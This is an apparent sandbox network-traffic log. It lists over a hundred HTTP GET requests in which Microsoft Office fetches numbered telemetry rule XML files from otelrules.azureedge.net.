          Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
